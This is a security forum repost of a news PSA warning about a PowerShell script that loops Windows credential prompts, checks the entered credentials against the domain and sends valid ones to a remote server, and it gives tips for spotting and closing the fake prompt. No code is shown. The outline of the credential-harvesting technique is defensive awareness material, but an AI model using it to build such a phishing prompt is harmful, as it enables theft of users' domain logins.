Jump to content
Login new information ×
Login new information
Donations campaign phase one 2024

PSA: Beware of Windows PowerShell Credential Request Prompts

steven36

By steven36
in Security & Privacy News

Recommended Posts

steven36

steven36

Posted
Posted

A new PowerShell script was posted on Github recently that prompts a victim to enter their login credentials, checks if they are correct, and then sends the credentials to a remote server. This allows an attacker to distribute the script and harvest domain login credentials from their victims.

 

https://s7d4.turboimg.net/sp/90a06139241c8860b2855b1def53444e/github03.png

 

 

Description on Github

This Github script utilizes the Get-Credential PowerShell cmdlet to display the login prompt that asks the user to enter their credentials. When the user enters their credentials, the script will try to use them to authenticate to the victim's domain, and if successful, will send the credentials to a remote server. If the entered credentials are incorrect, the script will keep prompting the user to enter their credentials.

At this point the only way to terminate the prompt, is to open Task Manager, look for a process called "Windows PowerShell", and then terminate it.

 

https://s7d8.turboimg.net/sp/70b90c2cb77e8b2604e7e221747032eb/task-manager.png

 

Task Manager

Thankfully, the login prompt displayed by this particular script makes it easy to spot as the alert will be titled "Windows PowerShell credential request" and will contain a blue ribbon with a set of keys as shown below.

 

https://s7d3.turboimg.net/sp/03f357ea528249e59c636b52b4cae81f/default-prompt.png

Default Get-credentials Prompt

 

 

The problem is that the the title of this alert can be changed by using a slightly different PowerShell cmdlet, which we will not be sharing here.  By using the different command, an attacker can further customize the login prompt to make it more convincing to the victim. 

 

For example, below we created a prompt that pretends to be Windows Defender and asks the user to login in order to clean the computer.

 

https://s7d4.turboimg.net/sp/1e6e40b14a8a0782889614b77eeca586/customized-prompt.png

 

While experienced computer users may still find prompt to be suspicious, there are many who may think it's legitimate and enter the login name and password.

 

Thankfully, even though the title may have been changed, the prompt itself still contains the blue ribbon with the set of keys in it. Therefore, if you ever see a prompt asking for your username and password and the alert look similar to the one above, be wary about entering your credentials. It very well could be an attempt to steal your domain login.

 

Source

 

Link to comment
Share on other sites
  • Views 542
  • Created
  • Last Reply

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...